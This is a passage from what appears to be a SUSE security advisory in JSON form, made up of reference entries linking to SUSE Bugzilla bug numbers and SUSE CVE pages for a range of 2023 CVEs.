"summary": "SUSE Bug 1255603",
"url": "https://bugzilla.suse.com/1255603"
},
{
"category": "self",
"summary": "SUSE Bug 1255605",
"url": "https://bugzilla.suse.com/1255605"
},
{
"category": "self",
"summary": "SUSE Bug 1255611",
"url": "https://bugzilla.suse.com/1255611"
},
{
"category": "self",
"summary": "SUSE Bug 1255614",
"url": "https://bugzilla.suse.com/1255614"
},
{
"category": "self",
"summary": "SUSE Bug 1255615",
"url": "https://bugzilla.suse.com/1255615"
},
{
"category": "self",
"summary": "SUSE Bug 1255616",
"url": "https://bugzilla.suse.com/1255616"
},
{
"category": "self",
"summary": "SUSE Bug 1255617",
"url": "https://bugzilla.suse.com/1255617"
},
{
"category": "self",
"summary": "SUSE Bug 1255618",
"url": "https://bugzilla.suse.com/1255618"
},
{
"category": "self",
"summary": "SUSE Bug 1255621",
"url": "https://bugzilla.suse.com/1255621"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255628",
"url": "https://bugzilla.suse.com/1255628"
},
{
"category": "self",
"summary": "SUSE Bug 1255629",
"url": "https://bugzilla.suse.com/1255629"
},
{
"category": "self",
"summary": "SUSE Bug 1255630",
"url": "https://bugzilla.suse.com/1255630"
},
{
"category": "self",
"summary": "SUSE Bug 1255632",
"url": "https://bugzilla.suse.com/1255632"
},
{
"category": "self",
"summary": "SUSE Bug 1255636",
"url": "https://bugzilla.suse.com/1255636"
},
{
"category": "self",
"summary": "SUSE Bug 1255688",
"url": "https://bugzilla.suse.com/1255688"
},
{
"category": "self",
"summary": "SUSE Bug 1255691",
"url": "https://bugzilla.suse.com/1255691"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255702",
"url": "https://bugzilla.suse.com/1255702"
},
{
"category": "self",
"summary": "SUSE Bug 1255704",
"url": "https://bugzilla.suse.com/1255704"
},
{
"category": "self",
"summary": "SUSE Bug 1255706",
"url": "https://bugzilla.suse.com/1255706"
},
{
"category": "self",
"summary": "SUSE Bug 1255707",
"url": "https://bugzilla.suse.com/1255707"
},
{
"category": "self",
"summary": "SUSE Bug 1255709",
"url": "https://bugzilla.suse.com/1255709"
},
{
"category": "self",
"summary": "SUSE Bug 1255722",
"url": "https://bugzilla.suse.com/1255722"
},
{
"category": "self",
"summary": "SUSE Bug 1255758",
"url": "https://bugzilla.suse.com/1255758"
},
{
"category": "self",
"summary": "SUSE Bug 1255759",
"url": "https://bugzilla.suse.com/1255759"
},
{
"category": "self",
"summary": "SUSE Bug 1255760",
"url": "https://bugzilla.suse.com/1255760"
},
{
"category": "self",
"summary": "SUSE Bug 1255763",
"url": "https://bugzilla.suse.com/1255763"
},
{
"category": "self",
"summary": "SUSE Bug 1255769",
"url": "https://bugzilla.suse.com/1255769"
},
{
"category": "self",
"summary": "SUSE Bug 1255770",
"url": "https://bugzilla.suse.com/1255770"
},
{
"category": "self",
"summary": "SUSE Bug 1255772",
"url": "https://bugzilla.suse.com/1255772"
},
{
"category": "self",
"summary": "SUSE Bug 1255774",
"url": "https://bugzilla.suse.com/1255774"
},
{
"category": "self",
"summary": "SUSE Bug 1255775",
"url": "https://bugzilla.suse.com/1255775"
},
{
"category": "self",
"summary": "SUSE Bug 1255776",
"url": "https://bugzilla.suse.com/1255776"
},
{
"category": "self",
"summary": "SUSE Bug 1255780",
"url": "https://bugzilla.suse.com/1255780"
},
{
"category": "self",
"summary": "SUSE Bug 1255785",
"url": "https://bugzilla.suse.com/1255785"
},
{
"category": "self",
"summary": "SUSE Bug 1255786",
"url": "https://bugzilla.suse.com/1255786"
},
{
"category": "self",
"summary": "SUSE Bug 1255789",
"url": "https://bugzilla.suse.com/1255789"
},
{
"category": "self",
"summary": "SUSE Bug 1255790",
"url": "https://bugzilla.suse.com/1255790"
},
{
"category": "self",
"summary": "SUSE Bug 1255792",
"url": "https://bugzilla.suse.com/1255792"
},
{
"category": "self",
"summary": "SUSE Bug 1255793",
"url": "https://bugzilla.suse.com/1255793"
},
{
"category": "self",
"summary": "SUSE Bug 1255795",
"url": "https://bugzilla.suse.com/1255795"
},
{
"category": "self",
"summary": "SUSE Bug 1255798",
"url": "https://bugzilla.suse.com/1255798"
},
{
"category": "self",
"summary": "SUSE Bug 1255800",
"url": "https://bugzilla.suse.com/1255800"
},
{
"category": "self",
"summary": "SUSE Bug 1255801",
"url": "https://bugzilla.suse.com/1255801"
},
{
"category": "self",
"summary": "SUSE Bug 1255806",
"url": "https://bugzilla.suse.com/1255806"
},
{
"category": "self",
"summary": "SUSE Bug 1255807",
"url": "https://bugzilla.suse.com/1255807"
},
{
"category": "self",
"summary": "SUSE Bug 1255809",
"url": "https://bugzilla.suse.com/1255809"
},
{
"category": "self",
"summary": "SUSE Bug 1255810",
"url": "https://bugzilla.suse.com/1255810"
},
{
"category": "self",
"summary": "SUSE Bug 1255812",
"url": "https://bugzilla.suse.com/1255812"
},
{
"category": "self",
"summary": "SUSE Bug 1255814",
"url": "https://bugzilla.suse.com/1255814"
},
{
"category": "self",
"summary": "SUSE Bug 1255820",
"url": "https://bugzilla.suse.com/1255820"
},
{
"category": "self",
"summary": "SUSE Bug 1255838",
"url": "https://bugzilla.suse.com/1255838"
},
{
"category": "self",
"summary": "SUSE Bug 1255842",
"url": "https://bugzilla.suse.com/1255842"
},
{
"category": "self",
"summary": "SUSE Bug 1255843",
"url": "https://bugzilla.suse.com/1255843"
},
{
"category": "self",
"summary": "SUSE Bug 1255872",
"url": "https://bugzilla.suse.com/1255872"
},
{
"category": "self",
"summary": "SUSE Bug 1255875",
"url": "https://bugzilla.suse.com/1255875"
},
{
"category": "self",
"summary": "SUSE Bug 1255879",
"url": "https://bugzilla.suse.com/1255879"
},
{
"category": "self",
"summary": "SUSE Bug 1255883",
"url": "https://bugzilla.suse.com/1255883"
},
{
"category": "self",
"summary": "SUSE Bug 1255884",
"url": "https://bugzilla.suse.com/1255884"
},
{
"category": "self",
"summary": "SUSE Bug 1255886",
"url": "https://bugzilla.suse.com/1255886"
},
{
"category": "self",
"summary": "SUSE Bug 1255888",
"url": "https://bugzilla.suse.com/1255888"
},
{
"category": "self",
"summary": "SUSE Bug 1255890",
"url": "https://bugzilla.suse.com/1255890"
},
{
"category": "self",
"summary": "SUSE Bug 1255891",
"url": "https://bugzilla.suse.com/1255891"
},
{
"category": "self",
"summary": "SUSE Bug 1255892",
"url": "https://bugzilla.suse.com/1255892"
},
{
"category": "self",
"summary": "SUSE Bug 1255899",
"url": "https://bugzilla.suse.com/1255899"
},
{
"category": "self",
"summary": "SUSE Bug 1255902",
"url": "https://bugzilla.suse.com/1255902"
},
{
"category": "self",
"summary": "SUSE Bug 1255907",
"url": "https://bugzilla.suse.com/1255907"
},
{
"category": "self",
"summary": "SUSE Bug 1255911",
"url": "https://bugzilla.suse.com/1255911"
},
{
"category": "self",
"summary": "SUSE Bug 1255915",
"url": "https://bugzilla.suse.com/1255915"
},
{
"category": "self",
"summary": "SUSE Bug 1255918",
"url": "https://bugzilla.suse.com/1255918"
},
{
"category": "self",
"summary": "SUSE Bug 1255921",
"url": "https://bugzilla.suse.com/1255921"
},
{
"category": "self",
"summary": "SUSE Bug 1255924",
"url": "https://bugzilla.suse.com/1255924"
},
{
"category": "self",
"summary": "SUSE Bug 1255925",
"url": "https://bugzilla.suse.com/1255925"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1255931",
"url": "https://bugzilla.suse.com/1255931"
},
{
"category": "self",
"summary": "SUSE Bug 1255932",
"url": "https://bugzilla.suse.com/1255932"
},
{
"category": "self",
"summary": "SUSE Bug 1255934",
"url": "https://bugzilla.suse.com/1255934"
},
{
"category": "self",
"summary": "SUSE Bug 1255943",
"url": "https://bugzilla.suse.com/1255943"
},
{
"category": "self",
"summary": "SUSE Bug 1255944",
"url": "https://bugzilla.suse.com/1255944"
},
{
"category": "self",
"summary": "SUSE Bug 1255949",
"url": "https://bugzilla.suse.com/1255949"
},
{
"category": "self",
"summary": "SUSE Bug 1255951",
"url": "https://bugzilla.suse.com/1255951"
},
{
"category": "self",
"summary": "SUSE Bug 1255952",
"url": "https://bugzilla.suse.com/1255952"
},
{
"category": "self",
"summary": "SUSE Bug 1255955",
"url": "https://bugzilla.suse.com/1255955"
},
{
"category": "self",
"summary": "SUSE Bug 1255957",
"url": "https://bugzilla.suse.com/1255957"
},
{
"category": "self",
"summary": "SUSE Bug 1255961",
"url": "https://bugzilla.suse.com/1255961"
},
{
"category": "self",
"summary": "SUSE Bug 1255963",
"url": "https://bugzilla.suse.com/1255963"
},
{
"category": "self",
"summary": "SUSE Bug 1255964",
"url": "https://bugzilla.suse.com/1255964"
},
{
"category": "self",
"summary": "SUSE Bug 1255967",
"url": "https://bugzilla.suse.com/1255967"
},
{
"category": "self",
"summary": "SUSE Bug 1255974",
"url": "https://bugzilla.suse.com/1255974"
},
{
"category": "self",
"summary": "SUSE Bug 1255978",
"url": "https://bugzilla.suse.com/1255978"
},
{
"category": "self",
"summary": "SUSE Bug 1255984",
"url": "https://bugzilla.suse.com/1255984"
},
{
"category": "self",
"summary": "SUSE Bug 1255988",
"url": "https://bugzilla.suse.com/1255988"
},
{
"category": "self",
"summary": "SUSE Bug 1255990",
"url": "https://bugzilla.suse.com/1255990"
},
{
"category": "self",
"summary": "SUSE Bug 1255992",
"url": "https://bugzilla.suse.com/1255992"
},
{
"category": "self",
"summary": "SUSE Bug 1255993",
"url": "https://bugzilla.suse.com/1255993"
},
{
"category": "self",
"summary": "SUSE Bug 1255994",
"url": "https://bugzilla.suse.com/1255994"
},
{
"category": "self",
"summary": "SUSE Bug 1255996",
"url": "https://bugzilla.suse.com/1255996"
},
{
"category": "self",
"summary": "SUSE Bug 1256033",
"url": "https://bugzilla.suse.com/1256033"
},
{
"category": "self",
"summary": "SUSE Bug 1256034",
"url": "https://bugzilla.suse.com/1256034"
},
{
"category": "self",
"summary": "SUSE Bug 1256045",
"url": "https://bugzilla.suse.com/1256045"
},
{
"category": "self",
"summary": "SUSE Bug 1256050",
"url": "https://bugzilla.suse.com/1256050"
},
{
"category": "self",
"summary": "SUSE Bug 1256058",
"url": "https://bugzilla.suse.com/1256058"
},
{
"category": "self",
"summary": "SUSE Bug 1256071",
"url": "https://bugzilla.suse.com/1256071"
},
{
"category": "self",
"summary": "SUSE Bug 1256074",
"url": "https://bugzilla.suse.com/1256074"
},
{
"category": "self",
"summary": "SUSE Bug 1256081",
"url": "https://bugzilla.suse.com/1256081"
},
{
"category": "self",
"summary": "SUSE Bug 1256082",
"url": "https://bugzilla.suse.com/1256082"
},
{
"category": "self",
"summary": "SUSE Bug 1256083",
"url": "https://bugzilla.suse.com/1256083"
},
{
"category": "self",
"summary": "SUSE Bug 1256084",
"url": "https://bugzilla.suse.com/1256084"
},
{
"category": "self",
"summary": "SUSE Bug 1256085",
"url": "https://bugzilla.suse.com/1256085"
},
{
"category": "self",
"summary": "SUSE Bug 1256090",
"url": "https://bugzilla.suse.com/1256090"
},
{
"category": "self",
"summary": "SUSE Bug 1256093",
"url": "https://bugzilla.suse.com/1256093"
},
{
"category": "self",
"summary": "SUSE Bug 1256094",
"url": "https://bugzilla.suse.com/1256094"
},
{
"category": "self",
"summary": "SUSE Bug 1256095",
"url": "https://bugzilla.suse.com/1256095"
},
{
"category": "self",
"summary": "SUSE Bug 1256096",
"url": "https://bugzilla.suse.com/1256096"
},
{
"category": "self",
"summary": "SUSE Bug 1256099",
"url": "https://bugzilla.suse.com/1256099"
},
{
"category": "self",
"summary": "SUSE Bug 1256100",
"url": "https://bugzilla.suse.com/1256100"
},
{
"category": "self",
"summary": "SUSE Bug 1256104",
"url": "https://bugzilla.suse.com/1256104"
},
{
"category": "self",
"summary": "SUSE Bug 1256106",
"url": "https://bugzilla.suse.com/1256106"
},
{
"category": "self",
"summary": "SUSE Bug 1256107",
"url": "https://bugzilla.suse.com/1256107"
},
{
"category": "self",
"summary": "SUSE Bug 1256117",
"url": "https://bugzilla.suse.com/1256117"
},
{
"category": "self",
"summary": "SUSE Bug 1256119",
"url": "https://bugzilla.suse.com/1256119"
},
{
"category": "self",
"summary": "SUSE Bug 1256121",
"url": "https://bugzilla.suse.com/1256121"
},
{
"category": "self",
"summary": "SUSE Bug 1256145",
"url": "https://bugzilla.suse.com/1256145"
},
{
"category": "self",
"summary": "SUSE Bug 1256153",
"url": "https://bugzilla.suse.com/1256153"
},
{
"category": "self",
"summary": "SUSE Bug 1256178",
"url": "https://bugzilla.suse.com/1256178"
},
{
"category": "self",
"summary": "SUSE Bug 1256197",
"url": "https://bugzilla.suse.com/1256197"
},
{
"category": "self",
"summary": "SUSE Bug 1256231",
"url": "https://bugzilla.suse.com/1256231"
},
{
"category": "self",
"summary": "SUSE Bug 1256233",
"url": "https://bugzilla.suse.com/1256233"
},
{
"category": "self",
"summary": "SUSE Bug 1256234",
"url": "https://bugzilla.suse.com/1256234"
},
{
"category": "self",
"summary": "SUSE Bug 1256238",
"url": "https://bugzilla.suse.com/1256238"
},
{
"category": "self",
"summary": "SUSE Bug 1256263",
"url": "https://bugzilla.suse.com/1256263"
},
{
"category": "self",
"summary": "SUSE Bug 1256267",
"url": "https://bugzilla.suse.com/1256267"
},
{
"category": "self",
"summary": "SUSE Bug 1256268",
"url": "https://bugzilla.suse.com/1256268"
},
{
"category": "self",
"summary": "SUSE Bug 1256271",
"url": "https://bugzilla.suse.com/1256271"
},
{
"category": "self",
"summary": "SUSE Bug 1256273",
"url": "https://bugzilla.suse.com/1256273"
},
{
"category": "self",
"summary": "SUSE Bug 1256274",
"url": "https://bugzilla.suse.com/1256274"
},
{
"category": "self",
"summary": "SUSE Bug 1256279",
"url": "https://bugzilla.suse.com/1256279"
},
{
"category": "self",
"summary": "SUSE Bug 1256280",
"url": "https://bugzilla.suse.com/1256280"
},
{
"category": "self",
"summary": "SUSE Bug 1256285",
"url": "https://bugzilla.suse.com/1256285"
},
{
"category": "self",
"summary": "SUSE Bug 1256291",
"url": "https://bugzilla.suse.com/1256291"
},
{
"category": "self",
"summary": "SUSE Bug 1256292",
"url": "https://bugzilla.suse.com/1256292"
},
{
"category": "self",
"summary": "SUSE Bug 1256300",
"url": "https://bugzilla.suse.com/1256300"
},
{
"category": "self",
"summary": "SUSE Bug 1256301",
"url": "https://bugzilla.suse.com/1256301"
},
{
"category": "self",
"summary": "SUSE Bug 1256302",
"url": "https://bugzilla.suse.com/1256302"
},
{
"category": "self",
"summary": "SUSE Bug 1256335",
"url": "https://bugzilla.suse.com/1256335"
},
{
"category": "self",
"summary": "SUSE Bug 1256348",
"url": "https://bugzilla.suse.com/1256348"
},
{
"category": "self",
"summary": "SUSE Bug 1256351",
"url": "https://bugzilla.suse.com/1256351"
},
{
"category": "self",
"summary": "SUSE Bug 1256354",
"url": "https://bugzilla.suse.com/1256354"
},
{
"category": "self",
"summary": "SUSE Bug 1256358",
"url": "https://bugzilla.suse.com/1256358"
},
{
"category": "self",
"summary": "SUSE Bug 1256361",
"url": "https://bugzilla.suse.com/1256361"
},
{
"category": "self",
"summary": "SUSE Bug 1256364",
"url": "https://bugzilla.suse.com/1256364"
},
{
"category": "self",
"summary": "SUSE Bug 1256366",
"url": "https://bugzilla.suse.com/1256366"
},
{
"category": "self",
"summary": "SUSE Bug 1256367",
"url": "https://bugzilla.suse.com/1256367"
},
{
"category": "self",
"summary": "SUSE Bug 1256368",
"url": "https://bugzilla.suse.com/1256368"
},
{
"category": "self",
"summary": "SUSE Bug 1256369",
"url": "https://bugzilla.suse.com/1256369"
},
{
"category": "self",
"summary": "SUSE Bug 1256370",
"url": "https://bugzilla.suse.com/1256370"
},
{
"category": "self",
"summary": "SUSE Bug 1256371",
"url": "https://bugzilla.suse.com/1256371"
},
{
"category": "self",
"summary": "SUSE Bug 1256373",
"url": "https://bugzilla.suse.com/1256373"
},
{
"category": "self",
"summary": "SUSE Bug 1256375",
"url": "https://bugzilla.suse.com/1256375"
},
{
"category": "self",
"summary": "SUSE Bug 1256379",
"url": "https://bugzilla.suse.com/1256379"
},
{
"category": "self",
"summary": "SUSE Bug 1256387",
"url": "https://bugzilla.suse.com/1256387"
},
{
"category": "self",
"summary": "SUSE Bug 1256394",
"url": "https://bugzilla.suse.com/1256394"
},
{
"category": "self",
"summary": "SUSE Bug 1256395",
"url": "https://bugzilla.suse.com/1256395"
},
{
"category": "self",
"summary": "SUSE Bug 1256396",
"url": "https://bugzilla.suse.com/1256396"
},
{
"category": "self",
"summary": "SUSE Bug 1256528",
"url": "https://bugzilla.suse.com/1256528"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256606",
"url": "https://bugzilla.suse.com/1256606"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256861",
"url": "https://bugzilla.suse.com/1256861"
},
{
"category": "self",
"summary": "SUSE Bug 1256863",
"url": "https://bugzilla.suse.com/1256863"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257332",
"url": "https://bugzilla.suse.com/1257332"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-42752 page",
"url": "https://www.suse.com/security/cve/CVE-2023-42752/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53714 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53714/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53743 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53743/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53750 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53750/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53752 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53752/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53759 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53759/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53762 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53762/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53766 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53766/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53768 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53777 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53778 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53778/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53782 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53782/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53784 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53785 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53785/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53787 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53787/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53791 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53791/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53792 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53792/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53793 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53793/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53794 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53794/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53795 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53797 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53799 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53799/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53807 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53807/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53808 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53813 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53815 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53815/"
},
{
"category": "self",
